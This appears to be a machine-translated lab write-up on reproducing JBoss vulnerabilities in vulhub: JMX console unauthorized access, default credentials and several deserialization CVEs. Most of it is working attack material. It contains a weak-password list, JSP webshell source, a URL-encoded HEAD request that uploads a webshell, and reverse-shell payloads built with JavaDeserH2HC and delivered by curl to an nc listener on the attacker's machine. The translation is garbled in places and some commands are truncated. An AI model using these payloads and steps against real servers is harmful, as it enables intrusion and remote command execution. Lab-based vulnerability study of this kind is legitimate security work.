Location>code7788 >text

JBOSS Vulnerability Recurrence

Popularity:488 ℃/2024-11-16 18:04:48

Jboss Vulnerability Replication

Unified Range: /vulhub/jboss

JMX Console Unauthorized Access Vulnerability

# Introduction
JBoss webUI interface http://ip:port/jmx-consoleUnauthorized access (or default password admin/admin)
This can lead to the disclosure of JBoss deployment management information, and the attacker can also directly upload a * horse to obtain the webshell.

Vulnerability Discovery

 interviewshttp://ip:port/jmx-consoleVulnerability if direct access or weak password login is possible

image-20241115120532157

Remote deployment of WAR packages

  1. Find the option (Jboss comes with the deployment function) in the flavor=URL,type=DeploymentScanner point in (through the url of the way to deploy remotely)
image-20241115120908028
  1. Go to the page and find the addURL
image-20241115122608530
  1. Deploying war packages on vps
# Package the jsp horse as a war package
jar-cvf

# Start the web service on the vps
python3 -m

# Enter the address of the war package request
http://your-ip:8000/
image-20241115122640983
  1. Then click on theBacktoMBeanViewCome to the URLList to see if the Value value has been deployed, and finally click theApply Changes
image-20241115122813709
  1. come (or go) backjmx-consoleCatalog found Check for the presence of the WAR * we deployed
image-20241115122852417
  1. Access:http://your-ip/shell/Just connect the ant-sword.

Jboss weak password Getshell

JBoss Administration ConsoleThere exists a default account password to log in, deploy the war package getshell in the backend

# jboss weak password

admin/admin
jboss/admin
admin/jboss
admin/123456
admin/password
  1. strike (on the keyboard)Administration Console If you want to use the default account, enter the default account number.admin/vulhubAccess to the back office
image-20241115124436272
  1. Once inside, find theweb Application (WAR)ClickAdd a new resourceDeploying a WAR package (* Horse)
image-20241115124625618
  1. interviewshttp://your-ip:8080/cmd/Ant Sword Connection
image-20241115124909378

CVE-2007-1036

The /jmx-console/HtmlAdaptor path in JBoss is open to the public and does not have any authentication mechanism , resulting in an attacker can enter the JMx console and perform any function in it .
The vulnerability utilizes the ->DeploymentFileRepository-〉store() method in the backend to upload shells by passing information to four parameters
p1 is the name of the deployed war package, p2 is the filename of the uploaded file, p3 is the file format of the uploaded file, and p4 is the content of the uploaded file. By controlling these four parameters, you can upload a shell and control the whole server. p2 and p3 can be spliced, for example, p2=she, p3=. This time the server will still do the splicing and will pass in the specified path.
  1. Visit the following URL to determine the store() method
http: //your-ip:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=:service=DeploymentFileRepository
  1. Deploying war packages
image-20241115162542363
  • p1 is: the name of the deployed WAR package
  • p2 is: the filename of the uploaded file
  • p3 is: file format of uploaded files
  • p4 is: content in uploaded files (jsp *)
<%@ page import=".*" %>
<% String cmd = ("cmd"); String output = ""; if(cmd != null) { String s
= null; try { Process p = ().exec(cmd); BufferedReader sI = new BufferedRe
ader(new InputStreamReader(())); while((s = ()) != null) { output
+= s +"\r\n"; } } catch(IOException e) { (); } } (output);%>
  1. interviewshttp://your-ip:8080/job1/can immediately (do sth)
image-20241115163147846

CVE-2010-0738 (JMX Console security certification bypass)

The principle of utilization is the same as CVE-2007-1036, except that the HEAD request method is used to bypass the restrictions of GET and P0ST requests.
Affected Versions: jboss4.2.0-jboss4.3.0
  1. A packet grabber replaces the GET request with HEAD, constructing the following request header
HEAD /jmx-console/HtmlAdaptor?action=invokeOp&name=%3Aservice%3DDeploymentFileRep
ository&methodIndex=5&arg0=..//&arg1=shell&arg2=.jsp&arg3=%3c%25%40%20%70%61%
67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%69%6f%2e%2a%22%20%25%3e%20%0d%0a%3c%25%20%53%74%72%69%6e%67%20%63%6d%64%20%3d%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6d%64%22%29%3b%20%53%74%72%69%6e%67%20%6f%75%74%70%75%74%20%3d%20%22%22%3b%20%69%66%28%63%6d%64%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%53%74%72%69%6e%67%20%73%20%3d%20%6e%75
%6c%6c%3b%20%74%72%79%20%7b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%63%6d%64%29%3b%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%73%49%20%3d%20%6e%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72
%28%6e%65%77%20%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%3b%20%77%68%69%6c%65%28%28%73%20%3d%20%73%49%2e%72%65%61%64%4c%69%6e%65%28%29%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%70%75%74%20%2b%3d%20%73%20%2b%22%5c%72%5c%6e%22%3b%20%7d%20%7d%20%63%61%74%63%68%28%49%4f%45%78%63%65%70%74%69%6f%6e%20%65%29%20%7b%20%65%2e%70%72%69%6e%74%53%74%61%63%6b%54%72%61%63%65%28%29%3b%20%7d%20%
7d%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%6f%75%74%70%75%74%29%3b%25%3e&arg4=True HTTP/1.1
  • arg3 is a jsp *, only the URL is encoded.
image-20241115163604047
  1. interviewshttp://your-ip:8080/jmx-console/?cmd=id
image-20241115163803260

CVE-2015-7501 (JMXInvokerServlet Deserialization Vulnerability)

Java deserialization error type, present in the ReadOnlyAccessFilter filter in the HttpInvoker component of Jboss attempts to deserialize the data stream from the client without any security checks, with a very wide impact
The vulnerability is caused by jboss reading an object passed in by the user in an /invoker/JMXInvokerServlet request.

Vulnerability Discovery

interviewshttp://ip:port/invoker/JMXInvokerServletA vulnerability exists if a downloaded file appears

exploit

  1. downloadingJavaDeserH2HC
git clone /joaomatosf/

cd JavaDeserH2HC
  1. Compiling files and using tools
# Compile the file
javac -cp . :commons-collections-3.2.

# Generate deserialized strings with tools
java -cp . :commons-collections-3.2. ReverseShellCommonsCollectionsHashMap attacker ip:port
image-20241115170120757
  1. Listen on port 6666 and use curl to pass the generated file to Jboss.
# Listening
nc-lvvp 6666.

# Transfer a malicious string for Jboss to deserialize
curl http://target drone-ip:8080/invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollecti

image-20241115170848392
  • Bounce shell succeeded!
image-20241115170921254

CVE-2017-7504 (JBossMQ JMS deserialization vulnerability)

The CVE-2017-7504 vulnerability is similar in principle to the vulnerability in CVE-2015-7501, except that the path of exploitation has slightly changed, and CVE-2017-7504 appears under the /jbossmq-httpil/HTTPServerILServlet path.
Scope of impact: JBoss AS and previous versions

Vulnerability Discovery

 interviews/jbossmq-httpil/HTTPServerILServletIf the following screen appears, a vulnerability exists

image-20241115230020893

exploit

 Continue to utilizeJavaDeserH2HCRemember to open port 6666 for the attacker.

# Use the previous vulnerability to generate a deserialized string already, just use curl directly
curl http://target drone-ip:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @
image-20241115230350086
  • Success!
image-20241115230430761

CVE-2017-12149 (JbossApplicationServer deserialization command execution vulnerability)

Same as above, path changed to /invoker/readonly
Scope: JBoss -

Vulnerability Discovery

 interviews/invoker/readonlyIf the following error message with status code 500 is returned, the vulnerability exists.

image-20241115231244215

exploit

  • Continue to utilizeJavaDeserH2HC
curl http://target drone-ip:8080/invoker/readonly --data-binary @
  • Here comes the shell.
image-20241115231155913